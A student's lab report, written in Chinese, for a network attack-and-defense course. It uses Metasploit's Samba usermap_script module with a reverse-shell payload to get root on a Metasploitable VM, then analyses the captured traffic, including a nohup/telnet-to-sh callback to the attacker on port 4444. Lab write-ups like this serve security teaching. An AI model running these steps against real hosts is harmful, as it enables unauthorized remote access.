20212917于欣月 2021-2022-2 《网络攻防实践》第七周作业

20212917于欣月 2021-2022-2 《网络攻防实践》第七周作业

目录



1.实验要求及过程

虚拟机镜像名称 IP
kali 192.168.31.226
Linux Metaolitable 192.168.31.147

使用Metaspolit作为渗透测试软件,攻击Linux靶机上的Samba服务usermap_script安全漏洞,获取Linux靶机的主机访问权限。

  • 使用exploit:exploit/multi/samba/usermap_script渗透攻击模块

  • 选择攻击PAYLOAD为远程shell

  • 设置攻击参数

  • 执行攻击

  • 查看是否得到正确的远程shell

  • (1)在kali中输入msfconsole

  • (2)输入use exploit/multi/samba/usermap_script,使用exploit/multi/samba/usermap_script渗透攻击模块;
  • (3)使用show payloads,查看payload;再使用set payload cmd/unix/reverse,最后分别使用set LHOST 192.168.31.226set RHOST 192.168.31.147分别设置攻击机和靶机的IP;最后使用exploit进行攻击。
  • (4)攻击完成后,根据提示输入得到远程shell,再使用ifconfig查询靶机IP,靶机IP成功获取。通过和靶机ifconfig查询结果对比,IP相关信息无误。表明攻击成功。
  • (5)通过whoami查询,发现我们已经获得了root权限,而靶机仍然是非root账号登录,这表明提权成功。

攻防对抗实践

  • 攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
  • 防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
  • (1)攻击方:使用usermap_script安全漏洞,攻击2904zk的主机,IP是192.168.11.138,攻击成功,使用whoami查询,发现提权成功。
  • (2)防御方:对wireshark所抓包进行分析。
  • 第60436条,经过查询可知139号端口是Unix中的Samba服务端口,可知攻击利用了Samba服务漏洞。攻击发起时间是从ARP协议的询问开始,可以确定攻击者IP就是192.168.11.131,靶机IP是192.168.11.133。
  • 从第一个SMB数据包中找到shellcode如图所示。其中,nohup是no hang up的缩写,就是不挂断的意思,用nohup运行命令可以使命令永久的执行下去,和用户终端没有关系;telnet 192.168.11.131 4444表明数据是通过4444号通信端口管控传入攻击机的;sh是linux中运行shell的命令,是shell的解释器。
  • 对最后一个tcp流分析,可以看到成功攻入的信息,可以发现是借用了python的权限弹出具有高权限的窗口。

2.学习中遇到的问题及解决

  • 问题1:在ubuntu的命令行中,无法直接使用wireshark抓包
  • 答:说是安装GUI,但是过程比较繁琐,该实验目的只是为了对数据报进行分析,所以为了方便,直接在攻击机方进行抓包。

3.学习感想和体会

  • 对数据包的分析能力依旧很弱,当捕捉到大量数据包时,虽然有筛选过滤,但对于需要的结果仍需花费大量时间去查找对应的数据包。
posted @ 2022-04-25 20:59  雲深不知处  阅读(86)  评论(0编辑  收藏  举报